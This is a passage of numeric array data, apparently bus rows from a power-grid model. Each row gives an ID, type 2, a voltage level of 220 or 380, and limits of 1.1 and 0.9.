0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1068, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1069, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1071, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1072, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1073, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1074, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1075, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1077, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1078, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1079, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1080, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1081, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1082, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1083, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1084, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1085, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1086, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1087, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1088, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1089, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1090, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1091, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1092, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1093, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1094, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1095, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1096, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1097, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1098, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1099, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1101, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1102, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1103, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1104, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1105, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1106, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1107, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1108, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1109, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1110, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1111, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1112, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1113, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1115, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1116, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1117, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1118, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1119, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1120, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1121, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1122, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1123, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1124, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1125, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1126, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1127, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1128, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1129, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1130, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1131, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1132, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1133, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1134, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1135, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1136, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1138, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1139, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1140, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1141, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1142, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1143, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1144, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1145, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1146, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1147, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1148, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1149, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1150, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1151, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1152, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1153, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1154, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1155, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1156, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1157, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1158, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1159, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1160, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1162, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1163, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1164, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1165, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1166, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1167, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1168, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1169, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1170, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1171, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1172, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1173, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1174, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1175, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1176, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1177, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1178, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1179, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1180, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1181, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1182, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1183, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1184, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1185, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1186, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1187, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1188, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1189, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1190, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1191, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1192, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1193, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1194, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1196, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1197, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1198, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1199, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1200, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1202, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1203, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1204, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1206, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1207, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1211, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1212, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1213, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1214, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1215, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1216, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1217, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1218, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1219, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1220, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1221, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1222, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1224, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1225, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1226, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1227, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1228, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1229, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1230, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1233, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1235, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1236, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1239, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1240, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1241, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1243, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1244, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1246, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1247, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1248, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1249, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1250, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1251, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1252, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1253, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1254, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1255, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1256, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1257, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1258, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1259, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1261, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1264, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1265, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1266, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1267, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1271, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1274, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1275, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1276, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1277, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1278, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1282, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1283, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1284, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1286, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1287, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1288, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1289, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1290, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1291, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1292, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1293, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1294, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1295, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1300, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1301, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1302, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1303, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1306, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1307, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1308, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1312, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1317, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1319, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1320, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1323, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1324, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1325, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1326, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1327, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1328, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1329, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1330, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1331, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1333, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1336, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1337, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1339, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1340, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1341, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1346, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1348, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1349, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1356, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1357, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1359, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1360, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1361, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1362, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1363, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1364, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1365, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1366, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1367, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1369, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1372, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1373, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1374, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1375, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1376, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1377, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1378, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1379, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1380, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1381, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1382, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1383, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1384, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1385, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1386, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1387, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1388, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1389, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1390, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1391, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1392, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1393, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1394, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1397, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1398, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1399, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1401, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1402, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1403, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1404, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1405, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1406, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1407, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1408, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1409, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1410, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1411, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1412, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1413, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1414, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1418, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1419, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1421, 2, 0, 0, 0, 0, 0, 0.999535, 0, 220.0, 0, 1.1, 0.9 ], [1422, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1423, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1424, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1425, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1426, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1427, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1428, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1431, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1432, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1433, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1434, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1435, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1436, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1437, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1438, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1439, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1440, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1442, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1443, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1444, 